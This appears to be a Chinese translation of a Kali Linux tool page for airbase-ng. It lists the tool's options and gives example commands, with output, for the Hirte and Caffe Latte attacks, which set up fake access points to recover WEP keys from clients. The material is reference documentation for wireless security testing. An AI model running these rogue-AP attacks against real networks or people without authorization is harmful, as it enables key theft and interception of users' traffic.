Airbase-ng 介绍


实现了攻击 Caffe Latte WEP客户端
实现了Hirte WEP客户端攻击
能力导致WPA / WPA2握手被捕获

作者:Thomas d’Otreppe, Original work: Christophe Devine
证书:GPL v2

工具来源 主页
Kali aircrack-ng Repo 仓库

airbase-ng – 多用途工具旨在攻击客户与接入点(AP)本身

root@kali:~# airbase-ng --help

  Airbase-ng 1.2 rc4 - (C) 2008-2015 Thomas d'Otreppe
  Original work: Martin Beck

  usage: airbase-ng <options> <replay interface>

    -a bssid  set Access Point MAC address
    -i iface  capture packets from this interface
    -w WEP key  use this WEP key to en-/decrypt packets
    -h MAC  source mac for MITM mode
    -f disallow  disallow specified client MACs (default: allow)
    -W 0|1    [don't] set WEP flag in beacons 0|1 (default: auto)
    -q  quiet (do not print statistics)
    -v  verbose (print more messages)
    -A  Ad-Hoc Mode (allows other clients to peer)
    -Y in|out|both  external packet processing
    -c channel  sets the channel the AP is running on
    -X   hidden ESSID
    -s   force shared key authentication (default: auto)
    -S   set shared key challenge length (default: 128)
    -L   Caffe-Latte WEP attack (use if driver can't send frags)
    -N   cfrag WEP attack (recommended)
    -x nbpps  number of packets per second (default: 100)
    -y   disables responses to broadcast probes
    -0   set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type  sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type  same as -z, but for WPA2
    -V type  fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix  write all sent and received frames into pcap file
    -P  respond to all probes, even when specifying ESSIDs
    -I interval  sets the beacon interval value in ms
    -C seconds  enables beaconing of probed ESSID values (requires -P)
    -n hex  User specified ANonce when doing the 4-way handshake
    --help  Displays this usage screen

 Filter options:
   --bssid MAC  BSSID to filter/use
   --bssids file  read a list of BSSIDs out of that file
   --client MAC  MAC of client to filter
   --clients file  read a list of MACs out of that file
   --essid ESSID  specify a single ESSID (default: default)
   --essids file  read a list of ESSIDs out of that file
   --help  Displays this usage screen

airbase-ng 用法示例

Hirte Attack - 接入点模式

Hirte Attack - 接入点模式

Hirte攻击企图通过客户端检索一个WEP密钥。这个示例创建一个访问点6(-c 6)指定的频道ESSID(-e TotallyNotATrap)和使用cfrag WEP攻击(-N),设置在WEP flag 位(-W 1)。

root@kali:~# root@kali:~# airbase-ng -c 6 -e TotallyNotATrap -N -W 1 wlan0mon
15:51:11  Created tap interface at0
15:51:11  Trying to set MTU on at0 to 1500
15:51:11  Trying to set MTU on wlan0mon to 1800
15:51:11  Access Point with BSSID 3C:46:D8:4E:EF:AA started.

Caffe Latte Attack - 接入点模式

与Hirte攻击,Caffe Latte Attack 攻击企图通过客户端检索一个WEP密钥。这个示例创建一个访问点6频道(-c 6)与ESSID(-e AlsoNotATrap),并使用指定的拿铁咖啡WEP攻击(-L),设置在WEP flag 位(-W 1)。

root@kali:~# airbase-ng -c 6 -e AlsoNotATrap -L -W 1 wlan0mon
15:56:05  Created tap interface at0
15:56:05  Trying to set MTU on at0 to 1500
15:56:05  Access Point with BSSID 3C:46:D8:4E:EF:AA started.